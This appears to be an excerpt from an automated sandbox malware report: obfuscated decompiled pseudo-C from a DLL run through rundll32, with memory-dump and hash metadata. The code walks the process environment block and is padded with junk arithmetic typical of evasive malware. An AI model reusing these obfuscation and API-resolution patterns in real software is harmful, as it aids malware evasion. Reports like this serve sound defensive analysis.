                				 *((long long*)(__r9 + 0x2c0)) = 0x7ffa535e1cf8;
                				 *((long long*)(__r9 + 0x398)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x1d0)) - 0x1355;
                				 *((long long*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x3d0)) = __r9 + 0x390;
                				_t494 =  *[gs:0x60];
                				 *((long long*)(__r9 + 0x638)) = _t494;
                				 *((long long*)(__r9 + 0x640)) =  *((intOrPtr*)( *((intOrPtr*)(_t494 + 0x18)) + 0x10));
                				 *((long long*)(__r9 + 0x468)) = _t585;
                				 *((long long*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x310)) = 0x1fd7;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0xc8)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0xc8)) + ( *( *(__r9 + 0x110) + 0x88) ^ __r8);
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)))) =  *((intOrPtr*)( *(__r9 + 0x108) + 0x148)) + 0x64ed16;
                				 *( *((intOrPtr*)(__r9 + 0x468)) + 4) =  *( *(__r9 + 0x240) + 0x70) ^ 0x006e14f5;
                				r8d = 0x157a;
                				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x410) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x410) * ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x20)) + 0x138)) - __r8);
                				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x300) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x300) |  *((intOrPtr*)(__r9 + 0x20)) + 0x00000088;
                				 *( *((intOrPtr*)(__r9 + 0x468)) + 8) =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x2a8) ^ 0x006c2171;
                				 *( *(__r9 + 0x108) + 0x3d0) =  *( *(__r9 + 0x108) + 0x3d0) ^ 0x00001ed2;
                				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x4b0) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x4b0) |  *( *((intOrPtr*)(__r9 + 0x160)) + 0x128) ^ __r8;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0xc)) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x1b0) + 0x31e059;
                				_t662 =  *(__r9 + 0x240);
                				r11d = r11d + 0xa46;
                				 *(_t685 + 0xf0) = r11d;
                				r15d = 0x1ba7;
                				 *(_t662 + 0x198) =  *(_t662 + 0x198) * ( *( *(__r9 + 0x2a0) + 0x3c0) | __r8);
                				r12d = 0x1ec0;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0x10)) =  *( *(__r9 + 0x240) + 0x70) + 0x63eba7;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x70)) + 0x6bebe5;
                				 *(__r9 + 0x488) =  *(__r9 + 0x488) | _t662;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0x18)) =  *( *(__r9 + 0x240) + 0x70) - 0x1487;
                				 *(__r9 + 0x488) =  *(__r9 + 0x488) | _t662;
                				 *(_t685 + 0x120) = _t453 - 0xac5;
                				goto 0x535f739f;
                				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x298) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x298) ^ ( *( *(__r9 + 0x2a0) + 0x130) | 0x000010ae);
                				 *((long long*)(__r9 + 0x640)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x640))));
                				 *(__r9 + 0x138) =  *(__r9 + 0x138) |  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x1a8)) + 0x00001515;
                				 *( *(__r9 + 0x2a0) + 0x230) =  *( *(__r9 + 0x2a0) + 0x230) * ( *(__r9 + 0x240) + 0x188);
                				 *( *(__r9 + 0x108) + 0x398) =  *( *(__r9 + 0x108) + 0x398) * ( *( *((intOrPtr*)(__r9 + 0x20)) + 0xb0) | 0x00001c76);
                				 *((char*)(_t685 + 0x48)) = 1;
                				r8d = 0x1ad7;
                				 *(_t685 + 0x40) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x68)) - 0x1568;
                				 *((long long*)(_t685 + 0x38)) = _t585;
                				 *((long long*)(_t685 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x640)) + 0x60));
                				 *(_t685 + 0x28) = r15w;
                				 *((long long*)(_t685 + 0x20)) = _t700;
                				if (E00007FFA7FFA535FB3DC(_t585, __r9, _t677, _t680, _t682, _t700, _t697, _t709, _t705, _t702, _t700, _t677) != 0) goto 0x535f72fd;
                				_t170 = _t677 + 0x1b9; // 0x129b
                				r10d = _t170;
                				r8d =  *(_t685 + 0x84);
                				_t455 = _t705 + 0x74b;
                				r8d = r8d + 0x89a;
                				_t616 =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x640)) + 0x30));
                				r14d = r14d + 0xb9;
                				 *((long long*)(__r9 + 0x5f8)) = _t616;
                				r11d = __r9 + 0x1320;
                				 *((intOrPtr*)(_t685 + 0x78)) = _t682 + 0xe67;
                				 *(_t685 + 0x70) = r10d;
                				 *(_t685 + 0x68) = r11d;
                				r15d = _t616 + 0x96b;
                				 *((intOrPtr*)(_t685 + 0x60)) = _t680 - 0x61b;
                				r12d = _t616 + 0x1348;
                				 *((intOrPtr*)(_t685 + 0x58)) = _t455;
                				 *((intOrPtr*)(_t685 + 0x50)) = _t705 + 0xcb8;
                				 *((long long*)(_t685 + 0x48)) = __r9;
                				 *(_t685 + 0x40) =  *(_t685 + 0x118);
                				r9d = _t616 + 0x9ab;
                				 *((intOrPtr*)(_t685 + 0x38)) = _t462 + 0x2cd;
                				 *((intOrPtr*)(_t685 + 0x30)) = r14d;
                				 *(_t685 + 0x28) = r15d;
                				 *((intOrPtr*)(_t685 + 0x20)) = r12d;
                				_t367 = E00007FFA7FFA535F9404( *(_t685 + 0x118), _t680 - 0x61b,  *(_t685 + 0x120) + 0xffffff47,  *((intOrPtr*)(_t685 + 0x88)) + 0x1582, _t705 + 0xcb8, _t462 + 0x2cd, _t585, __r9, _t680, _t687, __r10);
                				r10d = _t367;
                				r9d =  *(_t685 + 0x100);
                				r9d = r9d - 0x11;
                				_t464 =  *(_t685 + 0x8c);
                				r15d =  *(_t685 + 0x90);
                				r12d =  *((intOrPtr*)(_t685 + 0x94));
                				 *( *((intOrPtr*)(__r9 + 0x468)) + 4) =  *( *(__r9 + 0x240) + 0x148) ^ 0x65694525;
                				 *(_t685 + 0x118) = _t367;
                				 *(_t685 + 0x100) = r9d;
                				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x300) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x300) ^ 0xfffff14b;
                				 *( *((intOrPtr*)(__r9 + 0x468)) + 8) =  *((intOrPtr*)( *(__r9 + 0x108) + 0x1b0)) + 0x53662f9d;
                				if (r15d - _t682 + 0x9c9 >= 0) goto 0x535f7a1d;
                				_t218 = _t695 + 0x214; // 0x214
                				if (r9d != _t218) goto 0x535f76c3;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x70)) + 0x69744ede;
                				 *( *(__r9 + 0x108) + 0x440) =  *( *(__r9 + 0x108) + 0x440) * ( *( *(__r9 + 0x108) + 0x140) ^ 0x00001515);
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x70)) + 0x59e8;
                				 *((intOrPtr*)( *(__r9 + 0x2a0) + 0xd8)) =  *((intOrPtr*)( *(__r9 + 0x2a0) + 0xd8)) + 0xffffea03 -  *(__r9 + 0x3d0);
                				 *( *(__r9 + 0x110) + 0x248) =  *( *(__r9 + 0x110) + 0x248) *  *( *(__r9 + 0x110) + 0x40) * 0x1515;
                				_t545 =  *((intOrPtr*)(__r9 + 0x440)) - 0x11f1;
                				 *( *(__r9 + 0x240) + 0x5e0) =  *( *(__r9 + 0x240) + 0x5e0) | _t545;
                				 *((intOrPtr*)(__r9 + 0x3e0))();
                				 *(__r9 + 0x290) = _t545;
                				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x188) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x188) * ( *(__r9 + 0xb0) | 0x000012ad);
                				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x18) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x18) ^  *( *((intOrPtr*)(__r9 + 0x160)) + 0x138) * 0x0000145c;
                				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x368) =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x248) | 0x00001ba7;
                				_t371 = GetCurrentThreadId();
                				r9d =  *(_t685 + 0x100);
                				_t461 =  *(_t685 + 0x84) + 0xc13;
                				 *(__r9 + 0x200) = _t371;
                				_t410 =  *((intOrPtr*)(_t685 + 0x108)) + 0xc8d;
                				if ( *((intOrPtr*)(_t685 + 0x98)) - _t682 + 0x268 > 0) goto 0x535f7a1d;
                				if ( *(__r9 + 0x2c8) !=  *(_t685 + 0xe8) -  *((intOrPtr*)(__r9 + 0x128))) goto 0x535f7a1d;
                				_t688 = r15d;
                				if ( *((intOrPtr*)(__r9 + 0x70)) - (_t688 & r9d |  *(__r9 + 0x480)) <= 0) goto 0x535f79e8;
                				if (r12d - ( *(__r9 + 0x250) &  *(__r9 + 0x2d8) | _t461) >= 0) goto 0x535f7a01;
                				_t696 =  *(_t685 + 0x120);
                				_t672 =  *(__r9 + 0x420);
                				r15d =  *(_t685 + 0xf0);
                				 *(__r9 + 0x390) =  *(__r9 + 0x390) ^  *(_t685 + 0xe0) -  *((intOrPtr*)(__r9 + 0x1b0));
                				_t558 = _t672 + _t688;
                				 *((intOrPtr*)(__r9 + 0x3c8)) =  *((intOrPtr*)(__r9 + 0x3c8)) + _t558;
                				r8d = _t680 + 0x1569;
                				r11d = r11d - (r15d ^  *(_t685 + 0x80));
                				 *(__r9 + 0x368) =  *(__r9 + 0x368) * _t558;
                				_t707 = r11d;
                				 *(_t685 + 0xe8) = r11d;
                				 *(__r9 + 0x178) =  *(__r9 + 0x178) * ( *(_t685 + 0x118) & _t707);
                				_t645 =  *(__r9 + 0x3c0);
                				 *(__r9 + 0x420) =  *(__r9 + 0x5d0) * _t461 + _t672;
                				 *((intOrPtr*)(__r9 + 0x70)) =  *((intOrPtr*)(__r9 + 0x70)) + (_t696 & _t707);
                				r15d = r15d + ( *(__r9 + 0x2c8) |  *(__r9 + 0x2a0));
                				 *(_t685 + 0xf0) = r15d;
                				r15d = _t696 + _t688;
                				r15d = r15d ^ r8d;
                				r15d = r15d * ( *((intOrPtr*)(__r9 + 0x20)) -  *(_t685 + 0xe0));
                				 *(__r9 + 0x350) =  *(__r9 + 0x350) ^ _t696 *  *(__r9 + 0x1d0) ^ _t696;
                				 *((intOrPtr*)(__r9 + 0x58)) =  *((intOrPtr*)(__r9 + 0x58)) + (_t645 &  *(__r9 + 0x240));
                				_t690 =  *(_t685 + 0xe0) * 0x0000181f ^  *(__r9 + 0x110);
                				 *(__r9 + 0x3c0) =  *(__r9 + 0x2e8) &  *(__r9 + 0x148) ^ _t645 ^ 0x00000c92;
                				 *(__r9 + 0x3d0) =  *(__r9 + 0x3d0) + _t464 * 0x1320;
                				 *((intOrPtr*)(__r9 + 0x88)) =  *((intOrPtr*)(__r9 + 0x88)) - ( *(__r9 + 0x310) &  *(__r9 + 0x2a0));
                				 *(__r9 + 0xc0) =  *(__r9 + 0xc0) |  *(__r9 + 0x3d0) ^ _t690;
                				r8d =  *(_t685 + 0xe0);
                				r8d = r8d * ( *(__r9 + 0x3a0) | 0x00000c92);
                				 *(__r9 + 0x110) = (_t696 + _t682 ^ _t707) + _t690;
                				 *(_t685 + 0xe0) = r8d;
                				 *(_t685 + 0x80) = _t464 * r8d;
                				 *(__r9 + 0x250) =  *(__r9 + 0x250) |  *((intOrPtr*)(__r9 + 0x4b0)) +  *(__r9 + 0x2d8);
                				r11d = r11d - (r11d | _t410 | 0x00001355);
                				 *(_t685 + 0x118) = r11d;
                				 *(__r9 + 0x18) =  *(__r9 + 0x140) *  *(__r9 + 0x3a0);
                				r8d =  *(__r9 + 0x298);
                				r8d = r8d ^ 0x00001515;
                				 *(__r9 + 0xa0) =  *(__r9 + 0xa0) * (r9d * _t410 | 0x000010ae);
                				__imp__GetCurrentActCtx(_t680, _t682);
                				r9d =  *(_t685 + 0x100);
                				 *(__r9 + 0x1d0) =  *(__r9 + 0x1d0) + 0xffffea97 -  *((intOrPtr*)(__r9 + 0x130));
                				 *(_t685 + 0x120) =  *(_t685 + 0x120) |  *(_t685 + 0x80) -  *((intOrPtr*)(__r9 + 0x1b0)) &  *(__r9 + 0x108);
                				r11d =  *(_t685 + 0xe8);
                				goto 0x535f7a01;
                				r12d = r12d + ( *(__r9 + 0x330) &  *(__r9 + 0x138)) *  *(__r9 + 0x420);
                				if (_t455 + 4 == _t707 -  *((intOrPtr*)(__r9 + 0x128))) goto 0x535f76fe;
                				return _t585 - 0xbff;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Current$Thread
                • String ID:
                • API String ID: 307130322-0
                • Opcode ID: b6237a3a3b9deda18b18038b162085afe4ec634ee142353ba3905221f4e90038
                • Instruction ID: 4454e397b7b2b59c77274ae8f317610f3f77a2307492b9aa5073a1679c87697e
                • Opcode Fuzzy Hash: b6237a3a3b9deda18b18038b162085afe4ec634ee142353ba3905221f4e90038
                • Instruction Fuzzy Hash: 44520872614BD88AD794CF19D588BEA77ACFB89B84F064126EB8D87750DF38D950CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00007FFA7FFA535F7A40(void* __ebx, void* __esi, void* __rax, long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r9, signed long long __r11) {
                				void* __rsi;
                				void* __rbp;
                				signed int _t451;
                				signed int _t458;
                				signed int _t459;
                				signed int _t480;
                				signed int _t496;
                				signed int _t518;
                				void* _t524;
                				void* _t525;
                				signed int _t526;
                				intOrPtr _t537;
                				void* _t539;
                				intOrPtr _t543;
                				void* _t545;
                				intOrPtr _t572;
                				intOrPtr _t589;
                				long long _t596;
                				long long _t606;
                				long long _t638;
                				signed long long _t639;
                				signed long long _t653;
                				signed int* _t665;
                				intOrPtr _t698;
                				intOrPtr _t708;
                				void* _t719;
                				void* _t721;
                				void* _t723;
                				void* _t724;
                				void* _t740;
                				signed long long _t744;
                				signed long long _t747;
                				void* _t749;
                				struct _CRITICAL_SECTION* _t751;
                
                				_t744 = __r11;
                				_t726 = __r8;
                				_t638 = __rbx;
                				 *((long long*)(_t723 + 0x10)) = __rbx;
                				_push(_t721);
                				_push(_t719);
                				_push(_t747);
                				_t724 = _t723 - 0x70;
                				r14d =  *(_t724 + 0xd0);
                				_t3 = _t726 - 0xa42; // -2074
                				r15d =  *(_t724 + 0xe8);
                				_t5 = _t726 - 0x96b; // -1859
                				r12d = __r9 - 0x1556;
                				r9d = r9d + 0xfffff9c2;
                				 *(_t724 + 0xc0) = _t3;
                				r15d = r15d + 0xfec;
                				 *(_t724 + 0xb0) = r9d;
                				 *((intOrPtr*)(_t724 + 0x50)) = _t5;
                				 *(_t724 + 0xd0) =  *((intOrPtr*)(_t724 + 0xd8)) + 0x7b;
                				_t12 = _t726 - 0x1a1; // 0x87
                				r14d = r14d + 0xffffece0;
                				_t13 = _t721 + 0xfe4; // 0x8a1
                				r8d = r15d;
                				_t524 = __rcx - 0xf3;
                				if (_t12 - _t13 >= 0) goto 0x535f8158;
                				r10d = __rbx - 0x83;
                				 *((intOrPtr*)(_t724 + 0x48)) = _t749 + 0x1c76;
                				r11d = _t719 + 0x7ef;
                				 *(_t724 + 0x40) = r10d;
                				 *((long long*)(_t724 + 0x38)) = __rdx;
                				 *(_t724 + 0x30) = r11d;
                				_t25 = _t721 + 0x1482; // 0xd3f
                				r9d = _t25;
                				 *(_t724 + 0x28) = _t719 - 0x8cc;
                				r8d = _t751 - 0x62d;
                				 *(_t724 + 0x20) = _t751 - 0xaf9;
                				E00007FFA7FFA535F8C00(_t751 - 0xaf9, _t5, __rbx, __rdx, _t719, __r8, __r9, _t740);
                				 *(__rdx + 0x61c) = 6;
                				r9d = 0;
                				r13d = 0x1582;
                				r14d = 0x8000001f;
                				_t32 = _t721 + 1; // 0x1583
                				_t458 = _t32;
                				 *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) ^  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x298)) - 0x00000c92;
                				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) +  *((intOrPtr*)(__rdx + 0x610));
                				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4) +  *((intOrPtr*)(__rdx + 0x614));
                				if ( *((intOrPtr*)(__rdx + 0x600)) <= 0) goto 0x535f7dca;
                				r10d = 0;
                				 *(__rdx + 0x3c8) =  *(__rdx + 0x130) | _t747;
                				 *((intOrPtr*)(__rdx + 0x2f8)) =  *((intOrPtr*)(__rdx + 0x2f8)) - ( *( *(__rdx + 0x240) + 0x5d0) ^ 0x000011f1);
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x110)) + 8)) = 0x2fce;
                				_t537 =  *((intOrPtr*)(__rdx + 0x604));
                				if (_t537 <= 0) goto 0x535f7d4d;
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x358)) + 0x2f8)) =  *((intOrPtr*)(__rdx + 0x298));
                				 *((long long*)(__rdx + 0x298)) =  *((long long*)(__rdx + 0x298)) - 1;
                				 *(__rdx + 0x128) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x110)) + 0x250)) - 0x1515;
                				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) ^  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4);
                				if (_t537 >= 0) goto 0x535f7c5a;
                				_t698 =  *((intOrPtr*)(__rdx + 0x430));
                				r8d =  *(_t698 +  *(__rdx + 0x608) * 4);
                				if ((( *(__rdx + 0x61c) & r14d) - _t458 | 0xffffffe0) + _t458 == 0) goto 0x535f7c73;
                				asm("inc ecx");
                				r10d = r10d + _t458;
                				 *((intOrPtr*)(_t698 +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)(_t698 +  *(__rdx + 0x60c) * 4)) + r8d;
                				 *( *((intOrPtr*)(__rdx + 0x110)) + 0x410) =  *( *((intOrPtr*)(__rdx + 0x110)) + 0x410) |  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128);
                				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) - 1;
                				_t653 =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x138) ^ 0x00001355;
                				 *( *(__rdx + 0x108) + 0x330) = _t653;
                				asm("cdq");
                				 *(__rdx + 0x608) = ( *(__rdx + 0x608) + _t458) %  *(__rdx + 0x458);
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x5d0)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x5d0)) + _t653 -  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x440));
                				asm("cdq");
                				 *(__rdx + 0x60c) = ( *(__rdx + 0x60c) + _t458) %  *(__rdx + 0x458);
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x110)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248));
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248)) =  *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248)) - 1;
                				_t539 = r10d -  *((intOrPtr*)(__rdx + 0x604));
                				if (_t539 < 0) goto 0x535f7bf3;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) +  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4);
                				if (_t539 >= 0) goto 0x535f7d82;
                				_t572 =  *((intOrPtr*)(__rdx + 0x430));
                				if ((( *(__rdx + 0x618) & r14d) - _t458 | 0xffffffe0) + _t458 == 0) goto 0x535f7d9d;
                				r8d =  *(_t572 +  *(__rdx + 0x608) * 4);
                				asm("inc ecx");
                				goto 0x535f7da8;
                				r8d =  *(_t572 +  *(__rdx + 0x608) * 4);
                				r9d = r9d + _t458;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) + r8d;
                				if (r9d -  *((intOrPtr*)(__rdx + 0x600)) < 0) goto 0x535f7ba8;
                				 *((intOrPtr*)(__rdx + 0x600)) = 0x3b610b;
                				r9d = 0;
                				 *(__rdx + 0x608) = 7;
                				r11d = 0x1b47;
                				 *(__rdx + 0x60c) = 4;
                				 *((intOrPtr*)(__rdx + 0x610)) = 0xf6da;
                				 *((intOrPtr*)(__rdx + 0x614)) = 0x18551;
                				 *((intOrPtr*)(__rdx + 0x604)) = 0xe5;
                				 *(__rdx + 0x618) = 8;
                				 *( *(__rdx + 0x108) + 0x4b8) =  *( *(__rdx + 0x108) + 0x4b8) ^ 0x000010ae;
                				 *(__rdx + 0x61c) = 0xb;
                				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) +  *((intOrPtr*)(__rdx + 0x610));
                				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4) +  *((intOrPtr*)(__rdx + 0x614));
                				 *( *(__rdx + 0x240) + 0x310) =  *( *(__rdx + 0x240) + 0x310) ^ ( *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) | _t747);
                				if ( *((intOrPtr*)(__rdx + 0x600)) <= 0) goto 0x535f804d;
                				r10d = 0;
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x128)) = 0x1b3e5bc;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x90)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x90)) +  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) - 0x1ba7;
                				_t543 =  *((intOrPtr*)(__rdx + 0x604));
                				if (_t543 <= 0) goto 0x535f7fb1;
                				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) ^  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4);
                				if (_t543 >= 0) goto 0x535f7efe;
                				_t708 =  *((intOrPtr*)(__rdx + 0x430));
                				r8d =  *(_t708 +  *(__rdx + 0x608) * 4);
                				if ((( *(__rdx + 0x61c) & r14d) - _t458 | 0xffffffe0) + _t458 == 0) goto 0x535f7f17;
                				asm("inc ecx");
                				r10d = r10d + _t458;
                				 *((intOrPtr*)(_t708 +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)(_t708 +  *(__rdx + 0x60c) * 4)) + r8d;
                				_t665 =  *(__rdx + 0x108);
                				 *(__rdx + 0x128) =  *(__rdx + 0x128) ^  *_t665;
                				 *_t665 =  *_t665 + _t638;
                				 *((intOrPtr*)( *(__rdx + 0x240) + 0x140)) =  *((intOrPtr*)( *(__rdx + 0x240) + 0x140)) +  *(__rdx + 0x108) - 0xffffff80;
                				_t480 =  *(__rdx + 0x458);
                				asm("cdq");
                				 *(__rdx + 0x608) = ( *(__rdx + 0x608) + _t458) % _t480;
                				asm("cdq");
                				 *(__rdx + 0x60c) = ( *(__rdx + 0x60c) + _t458) % _t480;
                				 *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x230) =  *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x230) * ( *( *(__rdx + 0x240) + 0xc8) ^ _t747);
                				_t545 = r10d -  *((intOrPtr*)(__rdx + 0x604));
                				if (_t545 < 0) goto 0x535f7ecf;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) - ( *( *(__rdx + 0x108) + 0x170) ^ _t744);
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) +  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4);
                				if (_t545 >= 0) goto 0x535f8005;
                				_t589 =  *((intOrPtr*)(__rdx + 0x430));
                				if ((( *(__rdx + 0x618) & r14d) - _t458 | 0xffffffe0) + _t458 == 0) goto 0x535f8020;
                				r8d =  *(_t589 +  *(__rdx + 0x608) * 4);
                				asm("inc ecx");
                				goto 0x535f802b;
                				r8d =  *(_t589 +  *(__rdx + 0x608) * 4);
                				r9d = r9d + _t458;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) + r8d;
                				if (r9d -  *((intOrPtr*)(__rdx + 0x600)) < 0) goto 0x535f7e8b;
                				 *((intOrPtr*)(__rdx + 0x98)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x68)) + 0x14a3a2;
                				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x1a8) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x1a8) | _t744;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) +  *((intOrPtr*)(__rdx + 0x110)) + 0x238;
                				_t596 =  *(__rdx + 0x2a8) + 0x149810;
                				 *((long long*)(__rdx + 0x1b8)) = _t596;
                				E00007FFA7FFA535E229C(_t638,  *(__rdx + 0x608), _t719, _t721, __rdx);
                				 *((long long*)(__rdx + 0x78)) = _t596;
                				_t525 = _t524 + 0x650;
                				 *( *((intOrPtr*)(__rdx + 0x110)) + 0x330) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x108) * 0x1ba7;
                				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x250) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x250) |  *(__rdx + 0x240) + 0x00000300;
                				 *((intOrPtr*)(__rdx + 0x45c)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x20)) + 0x68)) - r13d;
                				 *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x130) =  *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x130) |  *( *((intOrPtr*)(__rdx + 0x358)) + 0x4b8);
                				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x4b8) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x4b8) + _t638;
                				 *((long long*)( *(__rdx + 0x240) + 0x3c0)) =  *( *(__rdx + 0x240)) + 0x157a;
                				_t606 =  *((intOrPtr*)(__rdx + 0x45c));
                				 *((long long*)(__rdx + 0x1b8)) = _t606;
                				goto 0x535f84d3;
                				if ( *((intOrPtr*)(__rdx + 0x440)) - _t606 >= 0) goto 0x535f84c9;
                				r13d = 0x1582;
                				 *(_t724 + 0x58) = 0x651;
                				if (0x651 - ( *(__rdx + 0x1a8) ^  *(__rdx + 0x478) ^  *(__rdx + 0x28)) <= 0) goto 0x535f841a;
                				 *((long long*)(_t724 + 0x60)) = 0;
                				_t496 = ( *(__rdx + 0x70) | _t458) *  *(__rdx + 0x58) - _t525 -  *((intOrPtr*)(__rdx + 0x110));
                				 *(__rdx + 0x2a8) =  *(__rdx + 0xb0) ^ 0x000011f1;
                				r14d = r14d + _t496;
                				 *(__rdx + 0x448) =  *(__rdx + 0x448) + ( *(__rdx + 0x1c0) ^ 0x00001fda);
